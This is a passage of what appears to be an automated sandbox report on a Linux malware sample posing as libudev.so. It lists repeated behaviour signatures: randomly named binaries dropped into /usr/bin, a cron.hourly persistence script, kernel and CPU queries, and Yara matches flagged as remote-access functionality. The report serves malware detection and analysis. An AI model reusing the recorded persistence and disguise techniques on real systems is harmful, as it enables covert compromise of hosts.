              Source: /usr/bin/bnuowhwlvc (PID: 6446)File: /usr/bin/bnuowhwlvcJump to behavior
              Source: /usr/bin/bnuowhwlvc (PID: 6449)File: /usr/bin/bnuowhwlvcJump to behavior
              Source: /usr/bin/bnuowhwlvc (PID: 6454)File: /usr/bin/bnuowhwlvcJump to behavior
              Source: /usr/bin/bnuowhwlvc (PID: 6455)File: /usr/bin/bnuowhwlvcJump to behavior
              Source: /usr/bin/chrcfbeejh (PID: 6461)File: /usr/bin/chrcfbeejhJump to behavior
              Source: /usr/bin/chrcfbeejh (PID: 6465)File: /usr/bin/chrcfbeejhJump to behavior
              Source: /usr/bin/chrcfbeejh (PID: 6467)File: /usr/bin/chrcfbeejhJump to behavior
              Source: /usr/bin/chrcfbeejh (PID: 6472)File: /usr/bin/chrcfbeejhJump to behavior
              Source: /usr/bin/chrcfbeejh (PID: 6473)File: /usr/bin/chrcfbeejhJump to behavior
              Source: /usr/bin/hfdnmorvjd (PID: 6478)File: /usr/bin/hfdnmorvjdJump to behavior
              Source: /usr/bin/hfdnmorvjd (PID: 6481)File: /usr/bin/hfdnmorvjdJump to behavior
              Source: /usr/bin/hfdnmorvjd (PID: 6485)File: /usr/bin/hfdnmorvjdJump to behavior
              Source: /usr/bin/hfdnmorvjd (PID: 6491)File: /usr/bin/hfdnmorvjdJump to behavior
              Source: /usr/bin/hfdnmorvjd (PID: 6492)File: /usr/bin/hfdnmorvjdJump to behavior
              Source: /usr/bin/mongquumqw (PID: 6497)File: /usr/bin/mongquumqwJump to behavior
              Source: /usr/bin/mongquumqw (PID: 6500)File: /usr/bin/mongquumqwJump to behavior
              Source: /usr/bin/mongquumqw (PID: 6504)File: /usr/bin/mongquumqwJump to behavior
              Source: /usr/bin/mongquumqw (PID: 6508)File: /usr/bin/mongquumqwJump to behavior
              Source: /usr/bin/mongquumqw (PID: 6509)File: /usr/bin/mongquumqwJump to behavior
              Source: /usr/bin/hrrmkhkkhv (PID: 6514)File: /usr/bin/hrrmkhkkhvJump to behavior
              Source: /usr/bin/hrrmkhkkhv (PID: 6518)File: /usr/bin/hrrmkhkkhvJump to behavior
              Source: /usr/bin/hrrmkhkkhv (PID: 6522)File: /usr/bin/hrrmkhkkhvJump to behavior
              Source: /usr/bin/hrrmkhkkhv (PID: 6525)File: /usr/bin/hrrmkhkkhvJump to behavior
              Source: /usr/bin/hrrmkhkkhv (PID: 6526)File: /usr/bin/hrrmkhkkhvJump to behavior
              Source: /usr/bin/cuwlelaebc (PID: 6532)File: /usr/bin/cuwlelaebcJump to behavior
              Source: /usr/bin/cuwlelaebc (PID: 6535)File: /usr/bin/cuwlelaebcJump to behavior
              Source: /usr/bin/cuwlelaebc (PID: 6538)File: /usr/bin/cuwlelaebcJump to behavior
              Source: /usr/bin/cuwlelaebc (PID: 6543)File: /usr/bin/cuwlelaebcJump to behavior
              Source: /usr/bin/cuwlelaebc (PID: 6544)File: /usr/bin/cuwlelaebcJump to behavior
              Source: /usr/bin/zpxsvbblcg (PID: 6550)File: /usr/bin/zpxsvbblcgJump to behavior
              Source: /usr/bin/zpxsvbblcg (PID: 6553)File: /usr/bin/zpxsvbblcgJump to behavior
              Source: /usr/bin/zpxsvbblcg (PID: 6557)File: /usr/bin/zpxsvbblcgJump to behavior
              Source: /usr/bin/zpxsvbblcg (PID: 6561)File: /usr/bin/zpxsvbblcgJump to behavior
              Source: /usr/bin/zpxsvbblcg (PID: 6562)File: /usr/bin/zpxsvbblcgJump to behavior
              Source: /usr/bin/ockerbcjas (PID: 6571)File: /usr/bin/ockerbcjasJump to behavior
              Source: /usr/bin/ockerbcjas (PID: 6576)File: /usr/bin/ockerbcjasJump to behavior
              Source: /usr/bin/ockerbcjas (PID: 6578)File: /usr/bin/ockerbcjasJump to behavior
              Source: /usr/bin/ockerbcjas (PID: 6581)File: /usr/bin/ockerbcjasJump to behavior
              Source: /usr/bin/ockerbcjas (PID: 6580)File: /usr/bin/ockerbcjasJump to behavior
              Source: /usr/bin/xtzjojyyzf (PID: 6588)File: /usr/bin/xtzjojyyzfJump to behavior
              Source: /usr/bin/xtzjojyyzf (PID: 6593)File: /usr/bin/xtzjojyyzfJump to behavior
              Source: /usr/bin/xtzjojyyzf (PID: 6596)File: /usr/bin/xtzjojyyzfJump to behavior
              Source: /usr/bin/xtzjojyyzf (PID: 6597)File: /usr/bin/xtzjojyyzfJump to behavior
              Source: /usr/bin/xtzjojyyzf (PID: 6598)File: /usr/bin/xtzjojyyzfJump to behavior
              Source: /tmp/libudev.so (PID: 6231)Path: /etc/cron.hourly/gcc.shJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)Path: /run/gcc.pidJump to dropped file
              Source: /tmp/libudev.so (PID: 6230)Queries kernel information via 'uname': Jump to behavior
              Source: /tmp/libudev.so (PID: 6231)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/mljnlxkfff (PID: 6264)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/mljnlxkfff (PID: 6267)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/mljnlxkfff (PID: 6269)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/mljnlxkfff (PID: 6272)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/mljnlxkfff (PID: 6275)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/jjfbelholv (PID: 6281)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/jjfbelholv (PID: 6284)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/jjfbelholv (PID: 6287)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/jjfbelholv (PID: 6290)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/jjfbelholv (PID: 6292)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/trcmbxxcta (PID: 6299)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/trcmbxxcta (PID: 6302)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/trcmbxxcta (PID: 6304)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/trcmbxxcta (PID: 6307)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/trcmbxxcta (PID: 6310)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ctwojuywol (PID: 6316)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ctwojuywol (PID: 6319)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ctwojuywol (PID: 6322)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ctwojuywol (PID: 6325)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ctwojuywol (PID: 6328)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/fsqerkomug (PID: 6335)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/fsqerkomug (PID: 6338)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/fsqerkomug (PID: 6340)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/fsqerkomug (PID: 6343)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/fsqerkomug (PID: 6346)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cjrbrkowir (PID: 6352)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cjrbrkowir (PID: 6355)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cjrbrkowir (PID: 6358)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cjrbrkowir (PID: 6360)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cjrbrkowir (PID: 6364)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ypclxoxcxk (PID: 6370)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ypclxoxcxk (PID: 6373)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ypclxoxcxk (PID: 6376)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ypclxoxcxk (PID: 6378)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ypclxoxcxk (PID: 6382)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uhyqxsqece (PID: 6389)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uhyqxsqece (PID: 6392)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uhyqxsqece (PID: 6394)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uhyqxsqece (PID: 6397)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uhyqxsqece (PID: 6400)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tiupbsaswr (PID: 6408)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tiupbsaswr (PID: 6411)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tiupbsaswr (PID: 6414)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tiupbsaswr (PID: 6416)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tiupbsaswr (PID: 6419)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uijxdyxaco (PID: 6425)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uijxdyxaco (PID: 6428)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uijxdyxaco (PID: 6431)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uijxdyxaco (PID: 6433)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uijxdyxaco (PID: 6436)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/bnuowhwlvc (PID: 6442)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/bnuowhwlvc (PID: 6445)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/bnuowhwlvc (PID: 6448)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/bnuowhwlvc (PID: 6451)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/bnuowhwlvc (PID: 6453)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/chrcfbeejh (PID: 6460)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/chrcfbeejh (PID: 6463)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/chrcfbeejh (PID: 6466)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/chrcfbeejh (PID: 6469)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/chrcfbeejh (PID: 6471)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/hfdnmorvjd (PID: 6477)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/hfdnmorvjd (PID: 6480)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/hfdnmorvjd (PID: 6483)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/hfdnmorvjd (PID: 6486)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/hfdnmorvjd (PID: 6490)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/mongquumqw (PID: 6496)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/mongquumqw (PID: 6499)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/mongquumqw (PID: 6502)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/mongquumqw (PID: 6505)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/mongquumqw (PID: 6507)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/hrrmkhkkhv (PID: 6513)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/hrrmkhkkhv (PID: 6516)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/hrrmkhkkhv (PID: 6519)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/hrrmkhkkhv (PID: 6521)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/hrrmkhkkhv (PID: 6524)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cuwlelaebc (PID: 6531)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cuwlelaebc (PID: 6534)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cuwlelaebc (PID: 6537)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cuwlelaebc (PID: 6540)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cuwlelaebc (PID: 6542)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/zpxsvbblcg (PID: 6549)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/zpxsvbblcg (PID: 6552)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/zpxsvbblcg (PID: 6555)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/zpxsvbblcg (PID: 6558)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/zpxsvbblcg (PID: 6560)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ockerbcjas (PID: 6568)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ockerbcjas (PID: 6570)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ockerbcjas (PID: 6573)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ockerbcjas (PID: 6575)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ockerbcjas (PID: 6579)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/xtzjojyyzf (PID: 6585)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/xtzjojyyzf (PID: 6587)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/xtzjojyyzf (PID: 6590)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/xtzjojyyzf (PID: 6592)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/xtzjojyyzf (PID: 6595)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/blrhrkypbo (PID: 6602)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/blrhrkypbo (PID: 6604)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/blrhrkypbo (PID: 6606)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/blrhrkypbo (PID: 6609)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/blrhrkypbo (PID: 6613)Queries kernel information via 'uname': Jump to behavior
              Source: /tmp/libudev.so (PID: 6231)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: libudev.so, type: SAMPLE
              Source: Yara matchFile source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6479.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6515.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6498.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6413.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6289.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6551.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6541.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6396.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6407.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6501.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6324.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6321.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6234.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6462.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6489.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6268.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6539.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6286.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6334.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6476.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6399.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6468.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6484.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6495.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6536.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6410.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6230, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6233, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6234, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6263, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6266, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6268, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6271, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6273, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6280, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6283, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6286, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6289, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6291, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6298, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6301, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6303, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6306, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6309, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6315, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6318, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6321, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6324, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6327, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6334, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6337, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6339, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6342, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6345, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6351, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6354, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6356, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6359, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6362, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6369, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6372, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6375, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6377, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6388, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6391, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6393, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6396, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6399, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6407, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6410, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6413, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6415, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6418, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6424, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6427, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6430, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6432, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6435, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6441, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6444, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6447, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6450, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6452, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6459, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6462, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6464, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6468, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6470, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6476, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6479, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6482, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6484, type: MEMORYSTR
              Source: Yara matchFile source: /usr/bin/hfdnmorvjd, type: DROPPED
              Source: Yara matchFile source: /usr/bin/ctwojuywol, type: DROPPED
              Source: Yara matchFile source: /usr/bin/cjrbrkowir, type: DROPPED
              Source: Yara matchFile source: /usr/bin/bnuowhwlvc, type: DROPPED
              Source: Yara matchFile source: /usr/bin/trcmbxxcta, type: DROPPED
              Source: Yara matchFile source: /usr/bin/fsqerkomug, type: DROPPED
